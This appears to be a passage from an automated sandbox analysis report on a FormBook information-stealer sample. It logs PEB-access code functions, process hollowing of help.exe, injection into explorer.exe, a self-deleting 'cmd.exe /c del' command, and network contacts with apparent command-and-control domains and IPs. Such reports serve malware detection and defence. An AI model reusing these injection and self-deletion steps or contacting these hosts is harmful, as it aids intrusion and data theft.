          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B82D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B73D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AE7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AF8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AD8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00AEF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00B98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exeCode function: 1_2_00ADEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exeCode function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02FB4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F22AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F22ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F0AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F2FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02EF52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F2D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F3927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02FAB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02FC8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02FBEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02EF9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F84257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F1B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F1A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F34A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F13A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02FBAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02EFAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F08A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02EF5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02EF5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F1DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02FA23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02FA23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F253C5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02FC5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F24BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F2B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F22397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F1EB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02FB138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F2138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02FAD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F01B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F23B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02EFDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02FC8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02EFDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02EFF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02FB131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\help.exe Code function: 6_2_02F1A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exe Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe Network Connect: 104.21.89.72 80
          Source: C:\Windows\explorer.exe Network Connect: 173.234.255.253 80
          Source: C:\Windows\explorer.exe Domain query: www.starflexacademy.com
          Source: C:\Windows\explorer.exe Domain query: www.dndemystified.com
          Source: C:\Windows\explorer.exe Domain query: www.meganfantastic.com
          Source: C:\Windows\explorer.exe Domain query: www.candydulce.com
          Source: C:\Windows\explorer.exe Domain query: www.ezonkorea.com
          Source: C:\Windows\explorer.exe Network Connect: 3.143.65.214 80
          Source: C:\Windows\explorer.exe Network Connect: 45.195.169.197 80
          Source: C:\Windows\explorer.exe Network Connect: 3.34.12.41 80
          Source: C:\Windows\explorer.exe Network Connect: 104.18.193.20 80
          Source: C:\Windows\explorer.exe Network Connect: 107.180.57.111 80
          Source: C:\Windows\explorer.exe Domain query: www.take-me-bergen.com
          Source: C:\Windows\explorer.exe Domain query: www.insurancedowntown.com
          Source: C:\Windows\explorer.exe Domain query: www.obi4ex.com
          Source: C:\Windows\explorer.exe Network Connect: 172.67.206.33 80
          Source: C:\Windows\explorer.exe Domain query: www.ladorreguita.com
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Section loaded: unknown target: C:\Users\user\Desktop\KY4cmAI0jU.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Section loaded: unknown target: C:\Windows\SysWOW64\help.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\help.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Thread register set: target process: 3388
          Source: C:\Windows\SysWOW64\help.exe Thread register set: target process: 3388
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Section unmapped: C:\Windows\SysWOW64\help.exe base address: B80000
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Process created: C:\Users\user\Desktop\KY4cmAI0jU.exe 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\KY4cmAI0jU.exe'
          Source: explorer.exe, 00000002.00000000.244267378.0000000001398000.00000004.00000020.sdmp Binary or memory string: ProgmanamF
          Source: explorer.exe, 00000002.00000000.244805482.0000000001980000.00000002.00000001.sdmp, help.exe, 00000006.00000002.483227631.00000000054F0000.00000002.00000001.sdmp Binary or memory string: Program Manager
          Source: explorer.exe, 00000002.00000000.235214151.000000000871F000.00000004.00000001.sdmp, help.exe, 00000006.00000002.483227631.00000000054F0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000000.244805482.0000000001980000.00000002.00000001.sdmp, help.exe, 00000006.00000002.483227631.00000000054F0000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000002.00000000.244805482.0000000001980000.00000002.00000001.sdmp, help.exe, 00000006.00000002.483227631.00000000054F0000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\KY4cmAI0jU.exe Code function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match File source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match File source: 00000006.00000002.479659636.0000000000B20000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.266058058.00000000009E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000000.00000002.218657751.0000000002170000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.477991027.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.265737304.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.266028847.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000002.479612487.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000001.216588771.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 0.2.KY4cmAI0jU.exe.2170000.3.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.KY4cmAI0jU.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0.2.KY4cmAI0jU.exe.2170000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.1.KY4cmAI0jU.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          The matrix is listed here per tactic (one column of the original matrix per line). Digits attached to a technique name are the count badges of the original matrix, marking the techniques actually observed for this sample.

